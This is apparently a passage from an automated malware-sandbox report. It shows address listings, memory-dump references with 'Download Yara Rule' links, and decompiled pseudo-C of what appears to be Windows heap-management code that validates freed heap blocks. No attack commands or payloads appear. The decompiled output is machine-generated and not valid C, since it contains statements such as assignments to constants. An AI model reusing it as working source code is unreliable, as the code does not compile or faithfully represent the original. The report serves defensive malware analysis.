                                                0x00902ac1
                                                0x00902aca
                                                0x00904394
                                                0x00904394
                                                0x00902ad9
                                                0x0090426d
                                                0x00000000
                                                0x00902adf
                                                0x00902ae2
                                                0x00902ae5
                                                0x00903024
                                                0x00903024
                                                0x00902aeb
                                                0x00902af1
                                                0x00902af4
                                                0x009043a8
                                                0x009043ab
                                                0x009043e4
                                                0x00902b32
                                                0x00902b4a
                                                0x00000000
                                                0x00902b4a
                                                0x009043ad
                                                0x00000000
                                                0x009043ad
                                                0x00902afa
                                                0x00902b00
                                                0x00902b28
                                                0x00902b2e
                                                0x00000000
                                                0x00902b2e
                                                0x00902b06
                                                0x009084f8
                                                0x00902b0c
                                                0x00902b0c
                                                0x00902b12
                                                0x00902b14
                                                0x00902b14
                                                0x00902b17
                                                0x00902b17
                                                0x00902b22
                                                0x0090420d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00902b22
                                                0x0090302a
                                                0x0090302a
                                                0x0090302c
                                                0x0090302e
                                                0x0090439f
                                                0x009043a0
                                                0x00000000
                                                0x00903034
                                                0x00903034
                                                0x00000000
                                                0x00903034
                                                0x0090302e
                                                0x00902a88
                                                0x00902a6c
                                                0x00902b97
                                                0x00902ba5
                                                0x00902ba7
                                                0x00902ba7
                                                0x00902baf
                                                0x00904253
                                                0x00904253
                                                0x00902bb5
                                                0x00902bb5
                                                0x00902bc1
                                                0x00902bc1
                                                0x00902a00
                                                0x00902a02
                                                0x00902a05
                                                0x00902a0c
                                                0x00902a0f
                                                0x00902a17
                                                0x0095a053
                                                0x0095a054
                                                0x0095a055
                                                0x0095a056
                                                0x0095a057
                                                0x0095a058
                                                0x00000000
                                                0x0095a058
                                                0x00000000
                                                0x00902a17
                                                0x009029d8
                                                0x009029e9
                                                0x00903ae9
                                                0x00903aeb
                                                0x00903af0
                                                0x00903afa
                                                0x00903afd
                                                0x00959d9c
                                                0x00959d9e
                                                0x00959d9f
                                                0x00959da0
                                                0x00959da0
                                                0x00903afd
                                                0x00903b03
                                                0x00903b07
                                                0x00959daa
                                                0x00959dad
                                                0x00959db0
                                                0x00959db2
                                                0x00959db5
                                                0x00959db8
                                                0x00959dbb
                                                0x00959dbd
                                                0x00959dbf
                                                0x00959ef3
                                                0x00959ef3
                                                0x00959ef5
                                                0x00959ef6
                                                0x00959ef7
                                                0x00959ef8
                                                0x00959ef9
                                                0x00959efb
                                                0x00959f99
                                                0x00959f99
                                                0x00000000
                                                0x00959f99
                                                0x00959dc5
                                                0x00959dc7
                                                0x00000000
                                                0x00000000
                                                0x00959dd0
                                                0x00959dd3
                                                0x00959dd9
                                                0x00959ddb
                                                0x00959ec3
                                                0x00959ec3
                                                0x00959ec6
                                                0x00959ec9
                                                0x00959ecb
                                                0x00959ece
                                                0x00959ed2
                                                0x00959f05
                                                0x00959f05
                                                0x00959f08
                                                0x00959f0a
                                                0x00959f13
                                                0x00959f1a
                                                0x00959f1d
                                                0x00959f1f
                                                0x00959f21
                                                0x00959f24
                                                0x00959f26
                                                0x00959f26
                                                0x00959f26
                                                0x00959f26
                                                0x00959f24
                                                0x00959f36
                                                0x00959f3b
                                                0x00959f3e
                                                0x00959f41
                                                0x00959f49
                                                0x00959f4c
                                                0x00959f50
                                                0x00959f72
                                                0x00959f77
                                                0x00959f52
                                                0x00959f6a
                                                0x00959f6f
                                                0x00959f84
                                                0x00959f8b
                                                0x00959f90
                                                0x00959f94
                                                0x00959f94
                                                0x00959f41
                                                0x00000000
                                                0x00959f0a
                                                0x00959ed8
                                                0x00959edd
                                                0x00959edf
                                                0x00000000
                                                0x00000000
                                                0x00959ee9
                                                0x00000000
                                                0x00959ee9
                                                0x00959de1
                                                0x00959dee
                                                0x00959dee
                                                0x00959df1
                                                0x00000000
                                                0x00000000
                                                0x00959de6
                                                0x00959de8
                                                0x00959dea
                                                0x00959dfd
                                                0x00959dfd
                                                0x00959dfe
                                                0x00959e01
                                                0x00959e03
                                                0x00959e06
                                                0x00959e0a
                                                0x00959e0d
                                                0x00959e0f
                                                0x00959e0f
                                                0x00959e0f
                                                0x00959e14
                                                0x00959e17
                                                0x00959e19
                                                0x00959e1e
                                                0x00959e21
                                                0x00959e28
                                                0x00959e2a
                                                0x00959e2c
                                                0x00959e2c
                                                0x00959e2c
                                                0x00959e2c
                                                0x00959e35
                                                0x00959e38
                                                0x00959ec0
                                                0x00000000
                                                0x00959e3e
                                                0x00959e3e
                                                0x00959e41
                                                0x00959e44
                                                0x00959e46
                                                0x00959e46
                                                0x00959e46
                                                0x00959e47
                                                0x00959e4a
                                                0x00959e4d
                                                0x00959e50
                                                0x00959eb2
                                                0x00959eb5
                                                0x00959ebb
                                                0x00000000
                                                0x00959ebb
                                                0x00959eb7
                                                0x00000000
                                                0x00959e52
                                                0x00959e52
                                                0x00959e55
                                                0x00959e58
                                                0x00959e8c
                                                0x00959e8c
                                                0x00959e8f
                                                0x00959e92
                                                0x00959e92
                                                0x00959e92
                                                0x00959e96
                                                0x00959eae
                                                0x00000000
                                                0x00959eae
                                                0x00959e5a
                                                0x00959e5e
                                                0x00959e70
                                                0x00959e60
                                                0x00959e60
                                                0x00959e63
                                                0x00959e66
                                                0x00959e68
                                                0x00959e68
                                                0x00959e68
                                                0x00959e6b
                                                0x00959e6b
                                                0x00959e7a
                                                0x00959e7c
                                                0x00000000
                                                0x00959e7e
                                                0x00959e87
                                                0x00000000
                                                0x00959e87
                                                0x00959e7c
                                                0x00959e50
                                                0x00959e38
                                                0x00959dec
                                                0x00959dec
                                                0x00959df3
                                                0x00959df5
                                                0x00000000
                                                0x00959df5
                                                0x00903b0d
                                                0x00903b0d
                                                0x00903b10
                                                0x00903b13
                                                0x00903b15
                                                0x00903b18
                                                0x00903b1b
                                                0x00903b1e
                                                0x00903b20
                                                0x00903b22
                                                0x00959fb4
                                                0x00959fb4
                                                0x00959fb6
                                                0x00959fb7
                                                0x00959fb8
                                                0x00959fb9
                                                0x00959fba
                                                0x00959fbc
                                                0x00000000
                                                0x00959fbc
                                                0x00903b28
                                                0x00903b2a
                                                0x00000000
                                                0x00000000
                                                0x00903b33
                                                0x00903b36
                                                0x00903b3c
                                                0x00903b3e
                                                0x00903bf3
                                                0x00903bf3
                                                0x00903bf6
                                                0x00903bf9
                                                0x00903bfb
                                                0x00903bfe
                                                0x00903c02
                                                0x00926301
                                                0x00926305
                                                0x0092630a
                                                0x0092630c
                                                0x00000000
                                                0x00000000
                                                0x00959faa
                                                0x00000000
                                                0x00959faa
                                                0x00903c08
                                                0x00903c08
                                                0x00903c0b
                                                0x00903c0d
                                                0x00959fc9
                                                0x00959fd0
                                                0x00959fd2
                                                0x00959fd4
                                                0x00959fd7
                                                0x00959fd9
                                                0x00959fd9
                                                0x00959fd9
                                                0x00959fd7
                                                0x00959fe6
                                                0x00959feb
                                                0x00959fee
                                                0x00959ff0
                                                0x00959ffc
                                                0x00959fff
                                                0x0095a003
                                                0x0095a025
                                                0x0095a02a
                                                0x0095a005
                                                0x0095a01d
                                                0x0095a022
                                                0x0095a037
                                                0x0095a03e
                                                0x0095a043
                                                0x0095a047
                                                0x0095a047
                                                0x00959ff0
                                                0x00903c16
                                                0x00903c19
                                                0x00903c1d
                                                0x00903c21
                                                0x00903c26
                                                0x00903c32
                                                0x00903c34
                                                0x00000000
                                                0x00903b44
                                                0x00903b44
                                                0x00903b47
                                                0x00903b47
                                                0x00903b4a
                                                0x00000000
                                                0x00000000
                                                0x00904242
                                                0x00904244
                                                0x00904246
                                                0x0090442e
                                                0x0090442f
                                                0x00903b55
                                                0x00903b57
                                                0x00903b5a
                                                0x00903b5e
                                                0x00903b61
                                                0x00903b63
                                                0x00903b63
                                                0x00903b63
                                                0x00903b68
                                                0x00903b6b
                                                0x00903b6d
                                                0x00903b72
                                                0x00903b75
                                                0x00903b7c
                                                0x00903b7e
                                                0x00904423
                                                0x00904423
                                                0x00903b87
                                                0x00903b8a
                                                0x00903bf0
                                                0x00903bf0
                                                0x00000000
                                                0x00903b8c
                                                0x00903b8c
                                                0x00903b8f
                                                0x00903b92
                                                0x00903b94
                                                0x00903b94
                                                0x00903b94
                                                0x00903b95
                                                0x00903b98
                                                0x00903b9b
                                                0x00904437
                                                0x0090443a
                                                0x0090443d
                                                0x009084cd
                                                0x009084d0
                                                0x009084e6
                                                0x009084e8
                                                0x00904443
                                                0x00904443
                                                0x00904443
                                                0x00000000
                                                0x00903ba1
                                                0x00903ba1
                                                0x00903ba4
                                                0x00903bcc
                                                0x00903bd2
                                                0x00903bd6
                                                0x00903be1
                                                0x00903bec
                                                0x00903bee
                                                0x00903bee
                                                0x00000000
                                                0x00903bee
                                                0x00903ba6
                                                0x00903baa
                                                0x009084ef
                                                0x00903bb0
                                                0x00903bb0
                                                0x00903bb3
                                                0x00903bb6
                                                0x00903bb8
                                                0x00903bb8
                                                0x00903bb8
                                                0x00903bbb
                                                0x00903bbb
                                                0x00903bc4
                                                0x00903bc6
                                                0x0090434e
                                                0x00904351
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00903bc6
                                                0x00903b9b
                                                0x00903b8a
                                                0x0090424c
                                                0x0090424c
                                                0x00903b50
                                                0x00903b52
                                                0x00000000
                                                0x00903b52
                                                0x00903b3e
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-2419525547
                                                • Opcode ID: a9b6662058ac8619430a8d1fad1c8d3a42d369ef1e1a316da51d30d5ddd5727b
                                                • Instruction ID: 106b4c711bf6f9e65e317c083c688f7e014236d4009cf098893885f6e46d93e1
                                                • Opcode Fuzzy Hash: a9b6662058ac8619430a8d1fad1c8d3a42d369ef1e1a316da51d30d5ddd5727b
                                                • Instruction Fuzzy Hash: F572BB70600206DFDB28CF19C491A7AB7B9FF85315F15C59DE84A8B292D734ED44CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090CD5B, Relevance: 4.2, Strings: 3, Instructions: 478COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 89%
                                                			E0090CD5B(signed char _a4, unsigned int _a8, signed int _a12, signed int _a15, intOrPtr _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t228;
				signed int _t236;
				signed int _t245;
				void* _t248;
				signed int _t249;
				signed char _t251;
				signed int _t263;
				signed char _t264;
				void* _t265;
				void* _t266;
				signed int _t269;
				void* _t270;

				_t251 = _a4;
				if(_a20 >  *((intOrPtr*)(_t251 + 0x60))) {
					_t228 = 0;
					goto L45;
				} else {
					__eflags =  *(__ebx + 0x4c);
					_push(__esi);
					__esi = _a12;
					__al =  *(__esi + 2);
					_a15 = __al;
					__eax =  *__esi & 0x0000ffff;
					_push(__edi);
					__edi = __esi + ( *__esi & 0x0000ffff) * 8;
					if( *(__ebx + 0x4c) != 0) {
						__eax =  *(__ebx + 0x50);
						 *__edi =  *__edi ^  *(__ebx + 0x50);
						 *(__edi + 2) =  *(__edi + 2) ^  *(__edi + 1);
						__al =  *(__edi + 2) ^  *(__edi + 1) ^  *__edi;
						__eflags =  *(__edi + 3) - __al;
						if(__eflags != 0) {
							_push(0);
							_push(__edi);
							_push(__ebx);
							__eax = E0099F8EE(__ebx, __edi, __esi, __eflags);
						}
					}
					__dl =  *(__edi + 2);
					__eflags = __dl & 0x00000001;
					if((__dl & 0x00000001) != 0) {
						L46:
						__eflags =  *(__ebx + 0x4c);
						if( *(__ebx + 0x4c) != 0) {
							 *(__edi + 1) =  *(__edi + 1) ^ __dl;
							__al =  *(__edi + 1) ^ __dl ^  *__edi;
							 *(__edi + 3) =  *(__edi + 1) ^ __dl ^  *__edi;
							__eax =  *(__ebx + 0x50);
							 *__edi =  *__edi ^  *(__ebx + 0x50);
							__eflags =  *__edi;
						}
						L48:
						__al = 0;
						L44:
						L45:
						return _t228;
					}
					__ecx =  *__edi & 0x0000ffff;
					__eax =  *__esi & 0x0000ffff;
					__eax = ( *__esi & 0x0000ffff) + ( *__edi & 0x0000ffff);
					_v8 = __eax;
					__eflags = __eax - _a20;
					if(__eax < _a20) {
						goto L46;
					}
					__edx =  *(__edi + 0xc);
					__eax = __edi + 8;
					__ecx =  *__eax;
					_v28 = __ecx;
					__ecx =  *(__ecx + 4);
					_v32 = __edx;
					__edx =  *__edx;
					__eflags = __edx - __ecx;
					if(__eflags != 0) {
						L75:
						_push(0);
						_push(__edx);
						_push(__ecx);
						_push(__eax);
						_push(__ebx);
						_push(0xc);
						__eax = E0099F840(__ebx, __ecx, __edx, __edi, __esi, __eflags);
						goto L48;
					}
					__eflags = __edx - __eax;
					if(__eflags != 0) {
						goto L75;
					}
					__eax =  *__edi & 0x0000ffff;
					 *((intOrPtr*)(__ebx + 0x78)) =  *((intOrPtr*)(__ebx + 0x78)) - ( *__edi & 0x0000ffff);
					__eax =  *(__ebx + 0xb8);
					__eflags = __eax;
					if(__eax == 0) {
						L24:
						__eax = _v28;
						__ecx = _v32;
						 *__ecx = __eax;
						 *(__eax + 4) = __ecx;
						__eflags =  *(__edi + 2) & 0x00000008;
						if(__eflags != 0) {
							__edx = __edi;
							__ecx = __ebx;
							__eax = E009261FE(__edx, __eflags);
							__eflags = __al;
							if(__al != 0) {
								goto L25;
							}
							 *__edi & 0x0000ffff = E0091EE4C(__ebx, __edi, __ebx, __edi,  *__edi & 0x0000ffff, 1);
							goto L48;
						}
						L25:
						__al =  *(__edi + 2);
						__eflags = __al & 0x00000004;
						if((__al & 0x00000004) != 0) {
							__ecx =  *__edi & 0x0000ffff;
							__ecx = ( *__edi & 0x0000ffff) * 8 - 0x10;
							_a4 = __ecx;
							__eflags = __al & 0x00000002;
							if((__al & 0x00000002) != 0) {
								__eflags = __ecx - 4;
								if(__ecx > 4) {
									_t158 =  &_a4;
									 *_t158 = _a4 - 4;
									__eflags =  *_t158;
								}
							}
							__eax = __edi + 0x10;
							__eax = E00928950(__edi + 0x10, _a4, 0xfeeefeee);
							_v32 = __eax;
							__eflags = __eax - _a4;
							if(__eax != _a4) {
								__eax =  *[fs:0x18];
								__eax =  *( *[fs:0x18] + 0x30);
								__eflags =  *(__eax + 0xc);
								if( *(__eax + 0xc) == 0) {
									_push("HEAP: ");
									__eax = E0094373B();
								} else {
									 *[fs:0x18] =  *( *[fs:0x18] + 0x30);
									 *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc));
									 *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c = E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
									_pop(__ecx);
								}
								__eax = _v32;
								_pop(__ecx);
								__eax = _v32 + __edi + 0x10;
								_push(_v32 + __edi + 0x10);
								E0094373B("HEAP: Free Heap block %lx modified at %lx after it was freed\n", __edi) = E009A06F9(__edi);
							}
						}
						__al =  *(__edi + 2);
						__edi =  *__esi & 0x0000ffff;
						__cl =  *(__esi + 7);
						_a4 = __al;
						__eax = __di & 0x0000ffff;
						__eax = (__di & 0x0000ffff) << 3;
						__eflags = __cl - 5;
						if(__cl == 5) {
							__ecx =  *(__ebx + 0x54) & 0x0000ffff;
							__edx =  *(__esi + 4) & 0x0000ffff;
							__ecx =  *(__ebx + 0x54) & 0x0000ffff ^ __edx;
						} else {
							__eflags = __cl & 0x00000040;
							if((__cl & 0x00000040) != 0) {
								__cl & 0x000000ff = __cl & 0x3f;
								__ecx =  *(__esi + 4 + (__cl & 0x3f) * 8) & 0x0000ffff;
							} else {
								__cl = __cl & 0x0000003f;
								__eflags = (__cl & 0x0000003f) - 0x3f;
								if((__cl & 0x0000003f) == 0x3f) {
									__eflags = __cl;
									if(__cl >= 0) {
										__eflags =  *(__ebx + 0x4c);
										if( *(__ebx + 0x4c) == 0) {
											__ecx = __di & 0x0000ffff;
										} else {
											__ecx =  *__esi;
											__eflags =  *(__ebx + 0x4c) & __ecx;
											if(( *(__ebx + 0x4c) & __ecx) != 0) {
												__eflags = __ecx;
											}
											__ecx = __cx & 0x0000ffff;
										}
									} else {
										__edx =  *__esi;
										__esi = __esi >> 3;
										__esi >> 0x00000003 ^ __edx = __esi >> 0x00000003 ^ __edx ^  *0x9d00a4;
										__ecx = __esi >> 0x00000003 ^ __edx ^  *0x9d00a4 ^ __ebx;
										__cx =  *((intOrPtr*)((__esi >> 0x00000003 ^ __edx ^  *0x9d00a4 ^ __ebx) + 0x10));
									}
									__ecx = __cx & 0x0000ffff;
									__ecx =  *(__esi + (__cx & 0x0000ffff) * 8 - 4);
								} else {
									__ecx = __cl & 0x000000ff;
									__ecx = __cl & 0x3f;
									__eflags = __ecx;
								}
							}
						}
						_v20 = __eax;
						__eax = _a20;
						_v8 = _v8 - _a20;
						__eflags = _v8 - 2;
						if(_v8 <= 2) {
							__eax = _v8;
							_a20 = _a20 + _v8;
							_v8 = _v8 & 0x00000000;
						}
						__eflags = _a15 & 0x00000002;
						if((_a15 & 0x00000002) != 0) {
							_t141 = _a20 * 8; // -8
							__edi = __esi + _t141 - 8;
							__eax =  *__esi & 0x0000ffff;
							__ecx =  *(__esi + __eax * 8 - 8);
							 *__edi =  *(__esi + __eax * 8 - 8);
							 *(__edi + 4) = __eax;
							__eax = E00908131();
							__eflags = __eax & 0x00000800;
							if((__eax & 0x00000800) != 0) {
								 *__esi & 0x0000ffff =  *(__edi + 2) & 0x0000ffff;
								__eax = E0098E3A7(__ebx,  *(__edi + 2) & 0x0000ffff,  *__esi & 0x0000ffff, _a20, 4);
								 *(__edi + 2) = __ax;
							}
							goto L33;
						} else {
							__eax = E00908131();
							__eflags = __eax & 0x00000800;
							if((__eax & 0x00000800) != 0) {
								__al =  *(__esi + 3);
								__ecx =  *__esi & 0x0000ffff;
								__edi = _a20;
								__ax = __al & 0x000000ff;
								__ax & 0x0000ffff = E0098E3A7(__ebx, __ax & 0x0000ffff,  *__esi & 0x0000ffff, __edi, 4);
								 *(__esi + 3) = __al;
								L34:
								__eax = 0;
								 *__esi = __di;
								__eflags = _v8;
								if(_v8 == 0) {
									__cl = _a4;
									 *(__esi + 2) =  *(__esi + 2) | __cl;
									__ecx = (__edi << 3) - _a16;
									__eflags = __ecx - 0x3f;
									if(__ecx >= 0x3f) {
										__eflags =  *(__esi + 7) & 0x00000080;
										if(( *(__esi + 7) & 0x00000080) == 0) {
											__eflags =  *(__ebx + 0x4c);
											if( *(__ebx + 0x4c) == 0) {
												__eax = __di & 0x0000ffff;
											} else {
												__eax =  *__esi;
												__eflags =  *(__ebx + 0x4c) & __eax;
												if(( *(__ebx + 0x4c) & __eax) != 0) {
													__eflags = __eax;
												}
												__eax = __ax & 0x0000ffff;
											}
										} else {
											__edx =  *__esi;
											__esi = __esi >> 3;
											__esi >> 0x00000003 ^  *__esi = __esi >> 0x00000003 ^  *__esi ^  *0x9d00a4;
											__eax = __esi >> 0x00000003 ^  *__esi ^  *0x9d00a4 ^ __ebx;
											__ax =  *((intOrPtr*)((__esi >> 0x00000003 ^  *__esi ^  *0x9d00a4 ^ __ebx) + 0x10));
										}
										__eax = __ax & 0x0000ffff;
										 *(__esi + 7) = 0x3f;
										 *(__esi + (__ax & 0x0000ffff) * 8 - 4) = __ecx;
									} else {
										 *(__esi + 7) = __cl;
									}
									__eax =  *__esi & 0x0000ffff;
									 *(__ebx + 0x54) =  *(__ebx + 0x54) ^ __ax;
									__eax = __ax & 0x0000ffff;
									 *(__esi + 4 + (__ax & 0x0000ffff) * 8) =  *(__ebx + 0x54) ^ __ax;
								} else {
									__ecx = __edi;
									__ecx = __edi << 3;
									_a20 = __ecx;
									__ecx = __ecx - _a16;
									__eflags = __ecx - 0x3f;
									if(__ecx >= 0x3f) {
										__eflags =  *(__esi + 7) & 0x00000080;
										if(( *(__esi + 7) & 0x00000080) == 0) {
											__eflags =  *(__ebx + 0x4c);
											if( *(__ebx + 0x4c) == 0) {
												__eax = __di & 0x0000ffff;
											} else {
												__eax =  *__esi;
												__eflags =  *(__ebx + 0x4c) & __eax;
												if(( *(__ebx + 0x4c) & __eax) != 0) {
													__eflags = __eax;
												}
												__eax = __ax & 0x0000ffff;
											}
										} else {
											__edx =  *__esi;
											__esi = __esi >> 3;
											__esi >> 0x00000003 ^ __edx = __esi >> 0x00000003 ^ __edx ^  *0x9d00a4;
											__eax = __esi >> 0x00000003 ^ __edx ^  *0x9d00a4 ^ __ebx;
											__ax =  *((intOrPtr*)((__esi >> 0x00000003 ^ __edx ^  *0x9d00a4 ^ __ebx) + 0x10));
										}
										__eax = __ax & 0x0000ffff;
										 *(__esi + 7) = 0x3f;
										 *(__esi + (__ax & 0x0000ffff) * 8 - 4) = __ecx;
									} else {
										 *(__esi + 7) = __cl;
									}
									__al =  *((intOrPtr*)(__esi + 6));
									__eflags = __al;
									if(__al == 0) {
										_t264 = _t251;
									} else {
										__eax = __al & 0x000000ff;
										__edx = __esi;
										__eax = (__al & 0x000000ff) << 0x10;
										__esi & 0xffff0000 = (__esi & 0xffff0000) - ((__al & 0x000000ff) << 0x10);
										__edx = (__esi & 0xffff0000) - ((__al & 0x000000ff) << 0x10) + 0x10000;
										__eflags = __edx;
									}
									E0090351F(_t251, _t264, _a20 + _t270, _a4,  *(_t251 + 0x40) >> 0x00000006 & 1, _t266, _v8);
								}
								if((_a8 & 0x00000008) != 0) {
									_t236 = _v20;
									__eflags = _a16 - _t236;
									if(_a16 > _t236) {
										E008FDFC0(_t236 + _t270 + 8, 0, _a16 - _t236);
									}
								} else {
									if(( *(_t251 + 0x40) & 0x00000040) != 0) {
										_t269 = _v20;
										_t263 = _t269 & 0x00000003;
										__eflags = _t263;
										if(_t263 != 0) {
											_t248 = 4;
											_t249 = _t248 - _t263;
											__eflags = _t249;
											_t263 = _t249;
										}
										_t265 = _t269 + _t263;
										__eflags = _a16 - _t265;
										if(_a16 > _t265) {
											_t245 = _a16 - _t263 - _t269 & 0xfffffffc;
											__eflags = _t245;
											if(_t245 != 0) {
												E009289F0(_t265 + _t270 + 8, _t245, 0xbaadf00d);
											}
										}
									}
								}
								if(( *(_t251 + 0x40) & 0x00000020) != 0) {
									asm("stosd");
									asm("stosd");
								}
								 *(_t270 + 2) = (_a8 >> 0x00000004 ^  *(_t270 + 2)) & 0x0000001f ^ _a8 >> 0x00000004;
								_t228 = 1;
								goto L44;
							}
							L33:
							__edi = _a20;
							goto L34;
						}
					} else {
						__ecx =  *__edi & 0x0000ffff;
						while(1) {
							__eflags = __ecx -  *(__eax + 4);
							if(__ecx <  *(__eax + 4)) {
								__ebx = __ecx;
								_v12 = __ecx;
								break;
							}
							__edx =  *__eax;
							__eflags = __edx;
							if(__edx == 0) {
								__ebx =  *(__eax + 4);
								__ebx =  *(__eax + 4) - 1;
								_v12 = __ebx;
								break;
							} else {
								__eax = __edx;
								continue;
							}
						}
						__ecx = __ebx;
						__ecx = __ebx -  *((intOrPtr*)(__eax + 0x14));
						__eflags =  *(__eax + 8);
						_v20 = __ecx;
						if( *(__eax + 8) != 0) {
							__ecx = __ecx + __ecx;
							__eflags = __ecx;
						}
						__edx =  *(__eax + 0x20);
						__ecx = __ecx << 2;
						__edx =  *(__eax + 0x20) + __ecx;
						_v16 = __ecx;
						__ecx =  *__edx;
						 *(__eax + 0xc) =  *(__eax + 0xc) - 1;
						_v24 =  *__edx;
						 *(__eax + 4) =  *(__eax + 4) - 1;
						__eflags = __ebx -  *(__eax + 4) - 1;
						if(__ebx ==  *(__eax + 4) - 1) {
							 *((intOrPtr*)(__eax + 0x10)) =  *((intOrPtr*)(__eax + 0x10)) - 1;
						}
						__ecx = __edi + 8;
						__eflags = _v24 - __edi + 8;
						if(_v24 != __edi + 8) {
							__ebx = _a4;
							goto L24;
						} else {
							__eflags =  *__eax;
							__ecx =  *(__eax + 4);
							if( *__eax == 0) {
								__ecx = __ecx - 1;
								__eflags = __ecx;
							}
							__eflags = _v12 - __ecx;
							__ecx =  *(__edi + 8);
							__ebx = _a4;
							if(__eflags >= 0) {
								__eflags = __ecx -  *((intOrPtr*)(__eax + 0x18));
								if(__ecx !=  *((intOrPtr*)(__eax + 0x18))) {
									 *__edx = __ecx;
									goto L24;
								}
								 *__edx =  *__edx & 0x00000000;
								L23:
								__ecx = _v20;
								__eax =  *(__eax + 0x1c);
								__ecx = __ecx >> 5;
								__eax = __eax + (__ecx >> 5) * 4;
								0 = 1;
								__ecx = __ecx & 0x0000001f;
								__edx = 1 << __cl;
								__edx =  !(1 << __cl);
								 *__eax =  *__eax & __edx;
								__eflags =  *__eax;
								goto L24;
							}
							_v24 = __ecx;
							__eflags = __ecx -  *((intOrPtr*)(__eax + 0x18));
							if(__ecx !=  *((intOrPtr*)(__eax + 0x18))) {
								__eflags =  *(__ebx + 0x4c);
								if( *(__ebx + 0x4c) == 0) {
									__ecx =  *(__ecx - 8) & 0x0000ffff;
								} else {
									__ecx =  *(__ecx - 8);
									__eflags =  *(__ebx + 0x4c) & __ecx;
									if(( *(__ebx + 0x4c) & __ecx) != 0) {
										__eflags = __ecx;
									}
									__ecx = __cx & 0x0000ffff;
								}
								__edx =  *__edi & 0x0000ffff;
								__ecx = __cx & 0x0000ffff;
								__edx = ( *__edi & 0x0000ffff) != (__cx & 0x0000ffff);
								__eflags = ( *__edi & 0x0000ffff) != (__cx & 0x0000ffff);
								if(( *__edi & 0x0000ffff) != (__cx & 0x0000ffff)) {
									goto L22;
								} else {
									__eax =  *(__eax + 0x20);
									__ecx = _v16;
									__edx = _v24;
									 *(_v16 + __eax) = __edx;
									goto L24;
								}
							}
							L22:
							__ecx =  *(__eax + 0x20);
							__edx = _v16;
							_t48 = __edx + __ecx;
							 *_t48 =  *(__edx + __ecx) & 0x00000000;
							__eflags =  *_t48;
							goto L23;
						}
					}
				}
			}


























                                                0x0090cd67
                                                0x0090cd6d
                                                0x0092fa09
                                                0x00000000
                                                0x0090cd73
                                                0x0090cd73
                                                0x0090cd77
                                                0x0090cd78
                                                0x0090cd7b
                                                0x0090cd7e
                                                0x0090cd81
                                                0x0090cd84
                                                0x0090cd85
                                                0x0090cd88
                                                0x0090cd8a
                                                0x0090cd8d
                                                0x0090cd92
                                                0x0090cd95
                                                0x0090cd97
                                                0x0090cd9a
                                                0x0095d5ae
                                                0x0095d5b0
                                                0x0095d5b1
                                                0x0095d5b2
                                                0x0095d5b2
                                                0x0090cd9a
                                                0x0090cda0
                                                0x0090cda3
                                                0x0090cda6
                                                0x0090cfc2
                                                0x0090cfc2
                                                0x0090cfc6
                                                0x0090cfcb
                                                0x0090cfcd
                                                0x0090cfcf
                                                0x0090cfd2
                                                0x0090cfd5
                                                0x0090cfd5
                                                0x0090cfd5
                                                0x0090cfd7
                                                0x0090cfd7
                                                0x0090cfbb
                                                0x0090cfbd
                                                0x0090cfbf
                                                0x0090cfbf
                                                0x0090cdac
                                                0x0090cdaf
                                                0x0090cdb2
                                                0x0090cdb4
                                                0x0090cdb7
                                                0x0090cdba
                                                0x00000000
                                                0x00000000
                                                0x0090cdc0
                                                0x0090cdc3
                                                0x0090cdc6
                                                0x0090cdc8
                                                0x0090cdcb
                                                0x0090cdce
                                                0x0090cdd1
                                                0x0090cdd3
                                                0x0090cdd5
                                                0x0095d5ce
                                                0x0095d5ce
                                                0x0095d5d0
                                                0x0095d5d1
                                                0x0095d5d2
                                                0x0095d5d3
                                                0x0095d5d4
                                                0x0095d5d6
                                                0x00000000
                                                0x0095d5d6
                                                0x0090cddb
                                                0x0090cddd
                                                0x00000000
                                                0x00000000
                                                0x0090cde3
                                                0x0090cde6
                                                0x0090cde9
                                                0x0090cdef
                                                0x0090cdf1
                                                0x0090ce95
                                                0x0090ce95
                                                0x0090ce98
                                                0x0090ce9b
                                                0x0090ce9d
                                                0x0090cea0
                                                0x0090cea4
                                                0x00949036
                                                0x00949038
                                                0x0094903a
                                                0x0094903f
                                                0x00949041
                                                0x00000000
                                                0x00000000
                                                0x0095d5c4
                                                0x00000000
                                                0x0095d5c4
                                                0x0090ceaa
                                                0x0090ceaa
                                                0x0090cead
                                                0x0090ceaf
                                                0x0095d5e0
                                                0x0095d5e3
                                                0x0095d5ea
                                                0x0095d5ed
                                                0x0095d5ef
                                                0x0095d5f1
                                                0x0095d5f4
                                                0x0095d5f6
                                                0x0095d5f6
                                                0x0095d5f6
                                                0x0095d5f6
                                                0x0095d5f4
                                                0x0095d602
                                                0x0095d606
                                                0x0095d60b
                                                0x0095d60e
                                                0x0095d611
                                                0x0095d617
                                                0x0095d61d
                                                0x0095d620
                                                0x0095d624
                                                0x0095d646
